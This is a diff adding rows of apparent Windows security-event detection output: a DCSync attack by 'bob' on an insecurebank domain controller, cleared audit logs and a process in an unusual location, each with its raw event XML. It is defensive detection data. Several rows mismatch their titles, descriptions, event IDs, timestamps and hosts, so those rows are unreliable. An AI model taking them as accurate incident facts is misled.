+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:17.006377Z"">
+    </TimeCreated>
+    <EventRecordID>2982081</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""472"" ThreadID=""4956"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
+      <SubjectUserName>a-jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x364f7</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
+    </TimeCreated>
+    <EventRecordID>198242595</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3616"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser )  with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.342445Z"">
+    </TimeCreated>
+    <EventRecordID>18196</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x13765</Data>
+    <Data Name=""NewProcessId"">0x4f0</Data>
+    <Data Name=""NewProcessName"">C:\Python27\python.exe</Data>
+    <Data Name=""TokenElevationType"">%%1938</Data>
+    <Data Name=""ProcessId"">0x12c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:39.499106Z"">
+    </TimeCreated>
+    <EventRecordID>2171289</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""420"" ThreadID=""996"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-308926384-506822093-3341789130-1106</SubjectUserSid>
+      <SubjectUserName>a-jbrown</SubjectUserName>
+      <SubjectDomainName>3B</SubjectDomainName>
+      <SubjectLogonId>0x38a14</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",IEWIN7,Security
+Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
+    </TimeCreated>
+    <EventRecordID>198242605</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3300"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:06.342445Z"">
+    </TimeCreated>
+    <EventRecordID>18195</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""780"" ThreadID=""3812"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-3583694148-1414552638-2922671848-1000</SubjectUserSid>
+      <SubjectUserName>IEUser</SubjectUserName>
+      <SubjectDomainName>IEWIN7</SubjectDomainName>
+      <SubjectLogonId>0x1371b</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",IEWIN7,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
+    </TimeCreated>
+    <EventRecordID>198242604</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
